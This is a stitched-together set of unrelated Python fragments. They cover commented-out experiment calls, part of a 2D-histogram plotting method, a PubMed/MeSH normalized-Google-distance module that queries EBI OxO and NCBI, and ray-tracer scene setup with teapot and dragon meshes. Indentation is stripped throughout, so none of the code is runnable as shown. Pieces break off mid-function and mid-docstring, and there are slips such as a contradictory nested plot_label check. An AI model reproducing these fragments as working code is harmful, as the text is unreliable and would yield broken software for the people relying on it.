# run_msrc_ff(original=True, whichExamples=range(0,100,10))
# run_msrc_ff(original=True, whichExamples=[range(50)])
# run_dishwasher_ff(original=True, whichExamples=range(1))
# run_dishwasher_ff(original=True, whichExamples=range(5))
# run_dishwasher_ff(original=True, whichExamples=range(1), keepWhichDims=[5])
# run_ucr_ff(original=True, whichExamples=range(2))
# run_msrc_outcast(original=True, whichExamples=[range(1)])
# run_tidigits_outcast(original=True, whichExamples=[range(1)])
# run_msrc_mdl(original=True, whichExamples=[range(1)])
# aha; recording 16 crashes it for some reason...
# run_msrc_mdl(original=True, whichExamples=[range(15, 17)]) # like 200s
# run_msrc_mdl(original=True, whichExamples=range(50), seedShiftStep=.1)
# run_msrc_mdl(original=True, whichExamples=range(50), forceNumDims=1)
# run_msrc_mdl(original=True, whichExamples=range(50), forceNumDims=-1)
# run_msrc_mdl(original=True, whichExamples=[range(1)], mdlSearchEachTime=True)
# run_msrc_mdl(original=True, whichExamples=[range(1)], mdlSearchEachTime=False)
# run_msrc_mdl(original=True, whichExamples=[range(10)])
# run_msrc_mdl(original=True)
# run_msrc_mdl(noise=True)
# run_msrc_mdl(adversarial=True)
# run_tidigits_mdl(original=True, whichExamples=range(10))
# run_tidigits_mdl(original=True, whichExamples=range(2), forceNumDims=1) # like 10s
# run_tidigits_mdl(original=True, whichExamples=range(50), forceNumDims=1)
# run_tidigits_mdl(original=True, whichExamples=range(50), forceNumDims=-1)
# run_tidigits_mdl(original=True, whichExamples=range(50), seedShiftStep=.1)
# run_tidigits_mdl(original=True, whichExamples=[range(5)], mdlSearchEachTime=True) # like 10s
# run_tidigits_mdl(original=True, whichExamples=[range(5)], mdlSearchEachTime=False) # like 10s
# run_tidigits_mdl(original=True)
# run_tidigits_mdl(noise=True)
# run_tidigits_mdl(adversarial=True)
# run_dishwasher_mdl(original=True, whichExamples=[range(2)])
# run_dishwasher_mdl(original=True, whichExamples=[range(1, 2)], mdlSearchEachTime=True) # like 120s
# run_dishwasher_mdl(original=True, whichExamples=[range(1, 2)], | |
(str) : Data keys to plot.
weight_key (str) : Data key for data to use as a weight. By None, no weight.
x_data_args, y_data_args (dicts) : Keyword arguments to be passed only to x or y.
slices (int or tuple of slices) : How to slices the data.
ax (axis) : What axis to use. By None creates a figure and places the axis on it.
x_range, y_range ( (float, float) ) : Histogram edges. If None, all data is enclosed. If list, set manually.
If float, is +- x_range*length scale at that snapshot.
n_bins (int) : Number of bins in the histogram.
vmin, vmax (float) : Limits for the colorbar.
aspect (str) : What should the aspect ratio of the plot be?
plot_halos (bool) : Whether or not to plot merger tree halos on top of the histogram.
Only makes sense for when dealing with positions.
add_colorbar (bool) : If True, add a colorbar to colorbar_args
colorbar_args (axis) : What axis to add the colorbar to. By None, is ax.
x_label, ylabel (str) : Axes labels.
add_x_label, add_y_label (bool) : Include axes labels?
plot_label (str or dict) : What to label the plot with. By None, uses self.label.
Can also pass a dict of full args.
outline_plot_label (bool) : If True, add an outline around the plot label.
label_galaxy_cut (bool) : If true, add a label that indicates how the galaxy was defined.
label_redshift (bool) : If True, add a label indicating the redshift.
label_fontsize (int) : Fontsize for the labels.
tick_param_args (args) : Arguments to pass to ax.tick_params. By None, don't change inherent defaults.
out_dir (str) : If given, where to save the file.
fix_invalid (bool) : Fix invalid values.
line_slope (float) : If given, draw a line with the given slope.
'''
if isinstance( slices, int ):
sl = ( slice(None), slices )
else:
sl = slices
varying_kwargs = {
'x': x_data_args,
'y': y_data_args,
'weight': weight_data_args
}
data_kwargs = utilities.dict_from_defaults_and_variations( kwargs, varying_kwargs )
# Get data
if x_data is None:
x_data = self.data_object.get_selected_data( x_key, sl=sl, *args, **data_kwargs['x'] ).copy()
if y_data is None:
y_data = self.data_object.get_selected_data( y_key, sl=sl, *args, **data_kwargs['y'] ).copy()
if y_div_function is not None:
y_div_values = y_div_function( x_data )
y_data /= y_div_values
# Fix NaNs
if fix_invalid:
x_mask = np.ma.fix_invalid( x_data ).mask
y_mask = np.ma.fix_invalid( y_data ).mask
mask = np.ma.mask_or( x_mask, y_mask )
x_data = np.ma.masked_array( x_data, mask=mask ).compressed()
y_data = np.ma.masked_array( y_data, mask=mask ).compressed()
if weight_key is None:
weights = None
else:
if weight_data is None:
weights = self.data_object.get_selected_data(
weight_key,
sl=sl,
*args,
**data_kwargs['weight']
).flatten()
else:
weights = weight_data
if fix_invalid:
weights = np.ma.masked_array( weights, mask=mask ).compressed()
if n_bins_x is None:
n_bins_x = n_bins
if n_bins_y is None:
n_bins_y = n_bins
if x_range is None:
x_range = [ x_data.min(), x_data.max() ]
elif isinstance( x_range, float ):
x_range = np.array( [ -x_range, x_range ])*self.data_object.length_scale[slices]
if y_range is None:
y_range = [ y_data.min(), y_data.max() ]
elif isinstance( y_range, float ):
y_range = np.array( [ -y_range, y_range ])*self.data_object.length_scale[slices]
if x_edges is None:
if x_scale == 'log':
x_edges = np.logspace( np.log10( x_range[0] ), np.log10( x_range[1] ), n_bins_x )
else:
x_edges = np.linspace( x_range[0], x_range[1], n_bins_x )
if y_edges is None:
if y_scale == 'log':
y_edges = np.logspace( np.log10( y_range[0] ), np.log10( y_range[1] ), n_bins_y )
else:
y_edges = np.linspace( y_range[0], y_range[1], n_bins_y )
# Make the histogram
hist2d, x_edges, y_edges = np.histogram2d( x_data, y_data, [x_edges, y_edges], weights=weights, normed=normed )
# If doing an average, divide by the number in each bin
if average:
average_hist2d, x_edges, y_edges = np.histogram2d( x_data, y_data, [x_edges, y_edges], normed=normed )
hist2d /= average_hist2d
# If making the y-axis conditional, divide by the distribution of data for the x-axis.
if conditional_y:
hist_x, x_edges = np.histogram( x_data, x_edges, normed=normed )
hist2d /= hist_x[:,np.newaxis]
# Divide the histogram bins by this array
if hist_div_arr is not None:
hist2d /= hist_div_arr
# Mask bins below a specified value
if min_bin_value_displayed is not None:
hist2d = np.ma.masked_where(
hist2d < min_bin_value_displayed,
hist2d,
)
# Plot
if ax is None:
fig = plt.figure( figsize=(10,9), facecolor='white' )
ax = plt.gca()
if z_scale == 'linear':
norm = plt_colors.Normalize()
elif z_scale == 'log':
norm = plt_colors.LogNorm()
else:
norm = z_scale
if cdf:
raise Exception(
"Not implemented yet. When implementing, use utilities.cumsum2d"
)
im = ax.pcolormesh(
x_edges,
y_edges,
hist2d.transpose(),
cmap = cmap,
norm = norm,
vmin = vmin,
vmax = vmax,
zorder = zorder,
)
# Add a colorbar
if add_colorbar:
if colorbar_args is None:
colorbar_args = ax
cbar = gen_plot.add_colorbar( colorbar_args, im, method='ax' )
else:
colorbar_args['color_object'] = im
cbar = gen_plot.add_colorbar( **colorbar_args )
cbar.ax.tick_params( labelsize=20 )
# Plot Line for easier visual interpretation
if line_slope is not None:
line_x = np.array( [ x_data.min(), x_data.max() ] )
line_y = line_slope*line_x
ax.plot( line_x, line_y, linewidth=3, linestyle='dashed', )
if horizontal_line is not None:
trans = transforms.blended_transform_factory( ax.transAxes, ax.transData )
ax.plot( [ 0., 1. ], [ horizontal_line, ]*2, transform=trans, **horizontal_line_kwargs )
if vertical_line is not None:
trans = transforms.blended_transform_factory( ax.transData, ax.transAxes )
ax.plot( [ vertical_line, ]*2, [ 0., 1. ], transform=trans, **vertical_line_kwargs )
# Plot label
if plot_label is not None:
if plot_label is None:
plt_label = ax.annotate(
s = self.label,
xy = (0.,1.0),
va = 'bottom',
xycoords = 'axes fraction',
fontsize = label_fontsize,
)
elif isinstance( plot_label, str ):
plt_label = ax.annotate(
s = plot_label,
xy = (0.,1.0),
va = 'bottom',
xycoords = 'axes fraction',
fontsize = label_fontsize,
)
elif isinstance( plot_label, dict ):
plt_label = ax.annotate( **plot_label )
else:
raise Exception( 'Unrecognized plot_label arguments, {}'.format( plot_label ) )
if outline_plot_label:
plt_label.set_path_effects([ path_effects.Stroke(linewidth=3, foreground='black'), path_effects.Normal() ])
# Upper right label (info label)
info_label = ''
if label_galaxy_cut:
info_label = r'$r_{ \rm cut } = ' + '{:.3g}'.format( self.data_object.galids.parameters['galaxy_cut'] ) + 'r_{ s}$'
if label_redshift:
try:
info_label = r'$z=' + '{:.3f}'.format( self.data_object.redshift ) + '$'+ info_label
except ValueError:
info_label = r'$z=' + '{:.3f}'.format( self.data_object.redshift.values[sl[1]] ) + '$'+ info_label
if label_galaxy_cut or label_redshift:
ax.annotate( s=info_label, xy=(1.,1.0225), xycoords='axes fraction', fontsize=label_fontsize,
ha='right' )
# Add axis labels
if add_x_label:
if x_label is None:
x_label = x_key
ax.set_xlabel( x_label, fontsize=label_fontsize )
if add_y_label:
if y_label is None:
y_label = y_key
ax.set_ylabel( y_label, fontsize=label_fontsize )
# Limits
ax.set_xlim( x_range )
ax.set_ylim( y_range )
# Scale
ax.set_xscale( x_scale )
ax.set_yscale( y_scale )
# Set tick parameters
if tick_param_args is not None:
ax.tick_params( **tick_param_args )
# Save the file
if out_dir is not None:
if save_file is None:
save_file = '{}_{:03d}.png'.format( self.label, self.data_object.ptracks.snum[slices] )
gen_plot.save_fig( out_dir, save_file, fig=fig, dpi=75 )
if close_plot_after_saving:
plt.close()
# Return?
if return_dist:
return hist2d, x_edges, y_edges
########################################################################
def statistic_and_interval(
self,
x_key, y_key,
x_data = None, y_data = None,
weights = None,
statistic = 'median',
lower_percentile = 16,
upper_percentile = 84,
plot_interval = True,
x_data_args = {}, y_data_args = {},
ax = None,
slices = None,
fix_invalid = False,
bins = 64,
linewidth = 3,
linestyle = '-',
color = 'k',
label = None,
zorder = 100,
alpha = 0.5,
plot_label = None,
add_plot_label = True,
plot_label_kwargs = {
'xy': (0.,1.0),
'va': 'bottom',
'xycoords': 'axes fraction',
'fontsize': 22,
},
return_values = False,
*args, **kwargs
):
if isinstance( slices, int ):
sl = ( slice(None), slices )
else:
sl = slices
varying_kwargs = {
'x': x_data_args,
'y': y_data_args,
}
data_kwargs = utilities.dict_from_defaults_and_variations( kwargs, varying_kwargs )
# Get data
if x_data is None:
x_data = self.data_object.get_selected_data( x_key, sl=sl, *args, **data_kwargs['x'] ).copy()
if y_data is None:
y_data = self.data_object.get_selected_data( y_key, sl=sl, *args, **data_kwargs['y'] ).copy()
# Fix NaNs
if fix_invalid:
x_mask = np.ma.fix_invalid( x_data ).mask
y_mask = np.ma.fix_invalid( y_data ).mask
mask = np.ma.mask_or( x_mask, y_mask )
x_data = np.ma.masked_array( x_data, mask=mask ).compressed()
y_data = np.ma.masked_array( y_data, mask=mask ).compressed()
# Calculate the statistic
if statistic == 'weighted_mean':
assert weights is not None, "Need to provide weights."
weighted_sum, bin_edges, binnumber = scipy.stats.binned_statistic(
x = x_data,
values = y_data * weights,
statistic = 'sum',
bins = bins,
)
weights_sum, bin_edges, | |
__author__ = '<NAME>'
__copyright__ = 'Oregon State University'
__credits__ = ['<NAME>']
__license__ = 'MIT'
__version__ = '0.1.0'
__maintainer__ = ''
__email__ = ''
__status__ = 'Prototype'
import math
import sys
import time
import CachedMethods
from cache_control_helper import CacheControlHelper
import pickledb
import os
import functools
from QueryNCBIeUtils import QueryNCBIeUtils
from QueryDisont import QueryDisont # DOID -> MeSH
from QueryEBIOLS import QueryEBIOLS # UBERON -> MeSH
from QueryMyChem import QueryMyChem
from typing import List
import sqlite3
# requests_cache.install_cache('NGDCache')
SCRIPT_DIR = os.path.dirname(os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__))))
WHATEVER_TO_MESH_DB_FILE = os.path.join(SCRIPT_DIR, 'curie_to_mesh.db')
MESH_TO_PUBMED_DB_FILE = os.path.join(SCRIPT_DIR, 'mesh_to_pmid.db')
NGD_NORMALIZER = 2.2e+7 * 20 # from PubMed home page there are 27 million articles; avg 20 MeSH terms per article
class NormGoogleDistance:
def __init__(self):
if os.path.exists(WHATEVER_TO_MESH_DB_FILE) and os.path.isfile(WHATEVER_TO_MESH_DB_FILE):
self.db_whatever_to_mesh = pickledb.load(WHATEVER_TO_MESH_DB_FILE,sig=False,
auto_dump=False)
else:
self.db_whatever_to_mesh = None
if os.path.exists(MESH_TO_PUBMED_DB_FILE) and os.path.isfile(MESH_TO_PUBMED_DB_FILE):
self.db_mesh_to_pubmed = pickledb.load(MESH_TO_PUBMED_DB_FILE,sig=False,
auto_dump=False)
else:
self.db_mesh_to_pubmed = None
@staticmethod
def compute_marginal_and_joint_counts(concept_pubmed_ids: List[str]) -> list:
return [list(map(lambda pmid_list: len(set(pmid_list)), concept_pubmed_ids)),
len(functools.reduce(lambda pmids_intersec_cumul, pmids_next:
set(pmids_next).intersection(pmids_intersec_cumul),
concept_pubmed_ids))]
@staticmethod
def compute_multiway_ngd_from_counts(marginal_counts: List[int],
joint_count: int) -> float:
# Make sure that things are within the right domain for the logs
# Should also make sure things are not negative, but I'll just do this with a ValueError
if None in marginal_counts:
return math.nan
elif 0 in marginal_counts or 0. in marginal_counts:
return math.nan
elif joint_count == 0 or joint_count == 0.:
return math.nan
else:
try:
return (max([math.log(count) for count in marginal_counts]) - math.log(joint_count)) / \
(math.log(NGD_NORMALIZER) - min([math.log(count) for count in marginal_counts]))
except ValueError:
return math.nan
def get_ngd_for_all_fast(self, curie_id_list: List[str], description_list: List[str]) -> (float, str):
assert len(curie_id_list) == len(description_list)
if self.db_whatever_to_mesh is not None and self.db_mesh_to_pubmed is not None:
mesh_ids_all = [self.db_whatever_to_mesh.get(curie_id) for curie_id in curie_id_list]
if all(mesh_ids_all):
#print(f"Going fast: {curie_id_list}") # for debugging purposes and counting db hits
pubmed_ids_for_curies = []
for mesh_ids in mesh_ids_all:
pubmed_ids_for_curie_set = set()
for mesh_id in mesh_ids:
pubmed_ids = self.db_mesh_to_pubmed.get(mesh_id)
if pubmed_ids is not False:
pubmed_ids_for_curie_set |= set(pubmed_ids)
pubmed_ids_for_curies.append(list(pubmed_ids_for_curie_set))
counts_res = NormGoogleDistance.compute_marginal_and_joint_counts(pubmed_ids_for_curies)
return NormGoogleDistance.compute_multiway_ngd_from_counts(*counts_res), "fast"
#print(f"Going slow: {curie_id_list}") # for debugging purposes and counting db misses
return NormGoogleDistance.get_ngd_for_all(curie_id_list, description_list), "slow"
@staticmethod
@CachedMethods.register
def query_oxo(uid):
"""
This takes a curie id and send that id to EMBL-EBI OXO to convert to cui
"""
url_str = 'https://www.ebi.ac.uk/spot/oxo/api/mappings?fromId=' + str(uid)
requests = CacheControlHelper()
try:
res = requests.get(url_str, headers={'accept': 'application/json'}, timeout=120)
except requests.exceptions.Timeout:
print('HTTP timeout in SemMedInterface.py; URL: ' + url_str, file=sys.stderr)
time.sleep(1) ## take a timeout because NCBI rate-limits connections
return None
except requests.exceptions.ConnectionError:
print('HTTP connection error in SemMedInterface.py; URL: ' + url_str, file=sys.stderr)
time.sleep(1) ## take a timeout because NCBI rate-limits connections
return None
except sqlite3.OperationalError:
print('Error reading sqlite cache; URL: ' + url_str, file=sys.stderr)
return None
status_code = res.status_code
if status_code != 200:
print('HTTP response status code: ' + str(status_code) + ' for URL:\n' + url_str, file=sys.stderr)
res = None
return res
@staticmethod
@CachedMethods.register
def get_mesh_from_oxo(curie_id):
if type(curie_id) != str:
curie_id = str(curie_id)
if curie_id.startswith('REACT:'):
curie_id = curie_id.replace('REACT', 'Reactome')
res = NormGoogleDistance.query_oxo(curie_id)
mesh_ids=None
if res is not None:
res = res.json()
mesh_ids = set()
n_res = res['page']['totalElements']
if int(n_res) > 0:
mappings = res['_embedded']['mappings']
for mapping in mappings:
if mapping['fromTerm']['curie'].startswith('MeSH'):
mesh_ids |= set([mapping['fromTerm']['curie'].split(':')[1]])
elif mapping['toTerm']['curie'].startswith('UMLS'):
mesh_ids |= set([mapping['toTerm']['curie'].split(':')[1]])
if len(mesh_ids) == 0:
mesh_ids = None
else:
mesh_ids = list(mesh_ids)
return mesh_ids
@staticmethod
@CachedMethods.register
def get_mesh_term_for_all(curie_id, description):
"""
Takes a curie ID, detects the ontology from the curie id, and then finds the mesh term
Params:
curie_id - A string containing the curie id of the node. Formatted <source abbreviation>:<number> e.g. DOID:8398
description - A string containing the English name for the node
current functionality (+ means has it, - means does not have it)
"Reactome" +
"GO" - found gene conversion but no biological process conversion
"UniProt" +
"HP" - +
"UBERON" +
"CL" - not supposed to be here?
"NCBIGene" +
"DOID" +
"OMIM" +
"ChEMBL" +
"""
if type(description) != str:
description = str(description)
curie_list = curie_id.split(':')
names = None
if QueryNCBIeUtils.is_mesh_term(description):
return [description + '[MeSH Terms]']
names = NormGoogleDistance.get_mesh_from_oxo(curie_id)
if names is None:
if curie_list[0].lower().startswith("react"):
res = QueryNCBIeUtils.get_reactome_names(curie_list[1])
if res is not None:
names = res.split('|')
elif curie_list[0] == "GO":
pass
elif curie_list[0].startswith("UniProt"):
res = QueryNCBIeUtils.get_uniprot_names(curie_list[1])
if res is not None:
names = res.split('|')
elif curie_list[0] == "HP":
names = QueryNCBIeUtils.get_mesh_terms_for_hp_id(curie_id)
elif curie_list[0] == "UBERON":
if curie_id.endswith('PHENOTYPE'):
curie_id = curie_id[:-9]
mesh_id = QueryEBIOLS.get_mesh_id_for_uberon_id(curie_id)
names = []
for entry in mesh_id:
if len(entry.split('.')) > 1:
uids=QueryNCBIeUtils.get_mesh_uids_for_mesh_tree(entry.split(':')[1])
for uid in uids:
try:
uid_num = int(uid.split(':')[1][1:]) + 68000000
names += QueryNCBIeUtils.get_mesh_terms_for_mesh_uid(uid_num)
except IndexError:
uid_num = int(uid)
names += QueryNCBIeUtils.get_mesh_terms_for_mesh_uid(uid_num)
else:
try:
uid = entry.split(':')[1]
uid_num = int(uid[1:]) + 68000000
names += QueryNCBIeUtils.get_mesh_terms_for_mesh_uid(uid_num)
except IndexError:
uid_num = int(entry)
names += QueryNCBIeUtils.get_mesh_terms_for_mesh_uid(uid_num)
if len(names) == 0:
names = None
else:
names[0] = names[0] + '[MeSH Terms]'
elif curie_list[0] == "NCBIGene":
gene_id = curie_id.split(':')[1]
names = QueryNCBIeUtils.get_pubmed_from_ncbi_gene(gene_id)
elif curie_list[0] == "DOID":
mesh_id = QueryDisont.query_disont_to_mesh_id(curie_id)
names = []
for uid in mesh_id:
uid_num = int(uid[1:]) + 68000000
name = QueryNCBIeUtils.get_mesh_terms_for_mesh_uid(uid_num)
if name is not None:
names += name
if len(names) == 0:
names = None
else:
names[0] = names[0] + '[MeSH Terms]'
elif curie_list[0] == "OMIM":
names = QueryNCBIeUtils.get_mesh_terms_for_omim_id(curie_list[1])
elif curie_list[0] == "ChEMBL":
chembl_id = curie_id.replace(':', '').upper()
mesh_id = QueryMyChem.get_mesh_id(chembl_id)
if mesh_id is not None:
mesh_id = int(mesh_id[1:]) + 68000000
names = QueryNCBIeUtils.get_mesh_terms_for_mesh_uid(mesh_id)
if names is not None:
if type(names) == list:
for name in names:
if name.endswith('[MeSH Terms]'):
return [name]
return names
return [description.replace(';', '|')]
@staticmethod
# @CachedMethods.register
def get_ngd_for_all(curie_id_list, description_list):
"""
Takes a list of currie ids and descriptions then calculates the normalized google distance for the set of nodes.
Params:
curie_id_list - a list of strings containing the curie ids of the nodes. Formatted <source abbreviation>:<number> e.g. DOID:8398
description_list - a list of strings containing the English names for the nodes
"""
assert len(curie_id_list) == len(description_list)
terms = [None] * len(curie_id_list)
for a in range(len(description_list)):
terms[a] = NormGoogleDistance.get_mesh_term_for_all(curie_id_list[a], description_list[a])
if type(terms[a]) != list:
terms[a] = [terms[a]]
if len(terms[a]) == 0:
terms[a] = [description_list[a]]
if len(terms[a]) > 30:
terms[a] = terms[a][:30]
terms_combined = [''] * len(terms)
mesh_flags = [True] * len(terms)
for a in range(len(terms)):
if len(terms[a]) > 1:
if not terms[a][0].endswith('[uid]'):
for b in range(len(terms[a])):
if QueryNCBIeUtils.is_mesh_term(terms[a][b]) and not terms[a][b].endswith('[MeSH Terms]'):
terms[a][b] += '[MeSH Terms]'
terms_combined[a] = '|'.join(terms[a])
mesh_flags[a] = False
else:
terms_combined[a] = terms[a][0]
if terms[a][0].endswith('[MeSH Terms]'):
terms_combined[a] = terms[a][0][:-12]
elif not QueryNCBIeUtils.is_mesh_term(terms[a][0]):
mesh_flags[a] = False
ngd = QueryNCBIeUtils.multi_normalized_google_distance(terms_combined, mesh_flags)
return ngd
@staticmethod
def api_ngd(mesh_term1, mesh_term2):
response = {}
if not QueryNCBIeUtils.is_mesh_term(mesh_term2):
response['message'] = "Term 2 '" + mesh_term2 + "' not found in MeSH"
if not QueryNCBIeUtils.is_mesh_term(mesh_term1):
if 'message' in response.keys():
response['message'] = "Term 1 '" + mesh_term1 + "' and " + response['message']
else:
response['message'] = "Term 1 '" + mesh_term1 + "' not found in MeSH"
if 'message' in response:
response["response_code"] = "TermNotFound"
return response
else:
value = QueryNCBIeUtils.multi_normalized_google_distance([mesh_term1, mesh_term2])
print(type(value))
if math.isnan(value):
response['value'] = None
response['response_code'] = "OK"
else:
response['response_code'] = "OK"
response['value'] = value
return response
@staticmethod
# @CachedMethods.register
def get_pmids_for_all(curie_id_list, description_list):
"""
Takes a list of currie ids and descriptions then calculates the normalized google distance for the set of nodes.
Params:
curie_id_list - a list of strings containing the curie ids of the nodes. Formatted <source abbreviation>:<number> e.g. DOID:8398
description_list - a list of strings containing the English names for the nodes
"""
assert len(curie_id_list) == len(description_list)
terms = [None] * len(curie_id_list)
for a in range(len(description_list)):
terms[a] = NormGoogleDistance.get_mesh_term_for_all(curie_id_list[a], description_list[a])
if type(terms[a]) != list:
terms[a] = [terms[a]]
if len(terms[a]) == 0:
terms[a] = [description_list[a]]
if len(terms[a]) > 30:
terms[a] = terms[a][:30]
terms_combined = [''] * len(terms)
mesh_flags = [True] * len(terms)
for a in range(len(terms)):
if len(terms[a]) > 1:
if not terms[a][0].endswith('[uid]'):
for b in range(len(terms[a])):
if QueryNCBIeUtils.is_mesh_term(terms[a][b]) and not terms[a][b].endswith('[MeSH Terms]'):
terms[a][b] += '[MeSH Terms]'
terms_combined[a] = '|'.join(terms[a])
mesh_flags[a] = False
else:
terms_combined[a] = terms[a][0]
if terms[a][0].endswith('[MeSH Terms]'):
terms_combined[a] = terms[a][0][:-12]
elif not QueryNCBIeUtils.is_mesh_term(terms[a][0]):
mesh_flags[a] = False
pmids = QueryNCBIeUtils.multi_normalized_pmids(terms_combined, mesh_flags)
pmids_with_prefix = []
for lst in pmids:
pmids_with_prefix.append([f"PMID:{x}" for x in lst])
return pmids_with_prefix
def test01():
res = NormGoogleDistance.compute_marginal_and_joint_counts([['a', 'b', 'a'], ['a', 'd'], ['e', 'a', 'c']])
assert abs(NormGoogleDistance.compute_multiway_ngd_from_counts(*res) - 0.05719216982573684) | |
use checkerboard vs image texture
diffuse_2 = Lambertian(checker_board, name="checkerboard")
# diffuse_2 = Lambertian(odd_color, name="odd_color")
else:
diffuse_2 = Lambertian(logo, name="io_logo'")
metal_1 = Metal(silver, name="metal_1")
world = GeometryList()
world.add(Sphere(Vec3(0, 1.25, 0.35), 1.0, metal_1))
# world.add(Sphere(Vec3(0, 1.0001, 0.35), 1.0, metal_1))
if True: # use plane vs triangles
plane_1 = Plane.plane_from_point_and_normal(pt=Vec3(0, -1, 0), normal=Vec3(0, 1, 0), material=diffuse_2)
world.add(plane_1)
else:
plane_x = 2
plane_y = -1
back_plane_z = -2
front_plane_z = 3
v0 = Vec3(-plane_x, plane_y, front_plane_z)
uv0 = (0,0)
v1 = Vec3(-plane_x ,plane_y,back_plane_z)
uv1 = (0, 1)
v2 = Vec3(plane_x, plane_y, front_plane_z)
uv2 = (1, 0)
v3 = Vec3(plane_x, plane_y,back_plane_z)
uv3 = (1, 1)
triangle = Triangle(v0, v1, v2, diffuse_2, uv0, uv1, uv2)
world.add(triangle)
triangle = Triangle(v1, v2, v3, diffuse_2, uv1, uv2, uv3)
world.add(triangle)
ambient = Vec3(0.5,0.5,0.5)
# ambient = Vec3(0.3,0.3,0.3)
background = SolidColor(Vec3(0.5, 0.7, 1.0))
# background = SolidColor(Vec3(0,0,0))
# light_1 = PointLight(pos=Vec3(11,10,3), color=Vec3(0.25, 0.25, 0.25))
geom = Disc(center=Vec3(11,10,3), normal=Vec3(0,-1,0), radius=1.5, material=SolidColor(Vec3(0.7, 0.7, 0.7)))
if settings and 'SAMPLES_PER_LIGHT' in settings:
samples = settings['SAMPLES_PER_LIGHT']
else:
samples = 25
light_2 = AreaLight(geom=geom, color=Vec3(0.6, 0.6, 0.6), num_samples=samples)
lights = [light_2]
scene = Scene(world, ambient=ambient, lights=lights, background=background)
camera = Camera(look_from=Vec3(8.5, 4, 0), look_at=Vec3(0, 1, 0), vup=Vec3(0, 1, 0), vert_fov=25)
return {'scene': scene, 'camera': camera}
def create_canonical_2(settings=None):
"""
teapot time!
TEAPOT_thingiverse.stl -- bbox=AABB(vmin=(-15.000, -10.005, -9.088), vmax=(16.371, 10.005, 7.162)), num_triangles=87298
"""
spacing=0.5
stl_filename = Path("models/TEAPOT_thingiverse.stl")
rot_axis = [1, 0, 0]
rot_rads = math.pi / 2.0 # 45 deg
look_from = Vec3(0, 15, 60)
look_at = Vec3(0, -1.5, 0)
plane_y = -9.1
plane_x = 25
back_plane_z = -25
front_plane_z = 15
light1_pos = Vec3(11, 10, 3)
silver = SolidColor(Vec3(0.7, 0.7, 0.7))
light_gray = SolidColor(Vec3(0.85, 0.85, 0.85))
odd_color = SolidColor(Vec3(0.2, 0.75, 0.2))
even_color = SolidColor(Vec3(0.1, 0.1, 0.1))
checker_board = CheckerBoard(even_color, odd_color, spacing=spacing)
diffuse_1 = Lambertian(checker_board, name="checkerboard")
# diffuse_2 = Lambertian(silver, name="silver_matte")
diffuse_2 = Lambertian(light_gray, name="silver_matte")
fuzz = 0.2
metal_1 = Metal(silver, fuzziness=fuzz, name="chrome")
world = GeometryList()
my_mesh = mesh.Mesh.from_file(stl_filename)
my_mesh.rotate(rot_axis, rot_rads)
# teapot_matl = metal_1
teapot_matl = diffuse_2
stl_mesh = STLMesh(my_mesh, teapot_matl, name="teapot")
print(f'stl_mesh {stl_filename} -- bbox={stl_mesh.bounding_box(None, None)}, num_triangles={stl_mesh.num_triangles}')
world.add(stl_mesh)
if False: # use plane vs triangles
plane_1 = Plane.plane_from_point_and_normal(pt=Vec3(0, plane_y, 0), normal=Vec3(0, 1, 0), material=diffuse_1)
world.add(plane_1)
else:
v0 = Vec3(-plane_x, plane_y, front_plane_z)
uv0 = (0,0)
v1 = Vec3(-plane_x ,plane_y,back_plane_z)
uv1 = (0, 1)
v2 = Vec3(plane_x, plane_y, front_plane_z)
uv2 = (1, 0)
v3 = Vec3(plane_x, plane_y,back_plane_z)
uv3 = (1, 1)
triangle = Triangle(v0, v1, v2, diffuse_1, uv0, uv1, uv2)
world.add(triangle)
triangle = Triangle(v1, v2, v3, diffuse_1, uv1, uv2, uv3)
world.add(triangle)
# ambient = Vec3(0.6,0.6,0.6)
ambient = Vec3(0.5,0.5,0.5)
background = SolidColor(Vec3(0.5, 0.7, 1.0))
# light_1 = PointLight(pos=light1_pos, color=Vec3(0.35, 0.35, 0.35))
light_1 = PointLight(pos=light1_pos, color=Vec3(0.5, 0.5, 0.5))
lights = [light_1]
scene = Scene(world, ambient=ambient, lights=lights, background=background)
camera = Camera(look_from=look_from, look_at=look_at, vup=Vec3(0, 1, 0), vert_fov=25)
return {'scene': scene, 'camera': camera}
def create_perlin_1(settings=None):
# sphere over a plane!
# dragon over a plane!
green = SolidColor(Vec3(0.2,0.7,0.2))
brown = SolidColor(Vec3(0.7,0.5,0.3))
# point_scale = 1.0
# wood_point_scale = 100.0
wood_point_scale = 20.0
wood, wood_name = (cc.CET_D6[155:240], 'wood3')
wood_colormap = [get_color(i, wood) for i in range(len(wood))]
kwargs = {'frequency': 0.01, 'frequency_mult': 10, }
translate = 1.0
scale = 0.5
wood_texture = NoiseTexture(wood_colormap, point_scale=wood_point_scale, translate=translate, scale=scale,
name=wood_name, eval_func=wood_pattern, eval_kwargs=kwargs)
jade, jade_name = (cc.CET_D13[135:240], 'jade2')
jade_colormap = [get_color(i, jade) for i in range(len(jade))]
kwargs = {'frequency': 0.024, 'frequency_mult': 2.5, 'amplitude_mult': 0.5, 'layers': 7, 'displace_x': 200}
translate = 0.20
scale = 1.0
# jade_point_scale = 600.0
jade_point_scale = 6.0
jade_texture = NoiseTexture(jade_colormap, point_scale=jade_point_scale, translate=translate, scale=scale,
name=jade_name, eval_func=marble_pattern, eval_kwargs=kwargs)
# diffuse_1 = Lambertian(wood_texture, name="wood'")
diffuse_2 = Lambertian(jade_texture, name="jade")
diffuse_3 = Lambertian(green, name="solid green")
diffuse_4 = Lambertian(brown, name="solid brown")
metal_1 = Metal(wood_texture, name="shiny wood", fuzziness=0.2)
metal_2 = Metal(jade_texture, name="metal_1", fuzziness=0.3)
ground_matl = metal_1
# ground_matl = diffuse_4
object_matl = diffuse_2
# object_matl = metal_2
# object_matl = diffuse_3
world = GeometryList()
if False:
# if True:
world.add(Sphere(Vec3(0, 0.0, 0.0), 8.0, object_matl))
settings = {'look_from': Vec3(0.0, 10, 40), 'look_at': Vec3(0, 0.25, 0),
'plane_x': 24, 'plane_y': -8.0, 'back_plane_z': -25, 'front_plane_z': 20,
'rot_axis': [1, 0, 0], 'rot_rads': math.pi / 2, 'translate': [0, 0, -12.5], 'show_walls': True}
else:
stl_filename = "models/dragon_65.stl"
settings = {'look_from': Vec3(0.0, 10, 40), 'look_at': Vec3(0, 0.25, 0),
'plane_x': 24, 'plane_y': -7.221, 'back_plane_z': -25, 'front_plane_z': 20,
'rot_axis': [1,0,0], 'rot_rads': math.pi/2, 'translate': [0, 0, -12.5], 'show_walls': True}
# if False:
if True:
my_mesh = mesh.Mesh.from_file(stl_filename)
if 'translate' in settings:
settings['translate'][0]
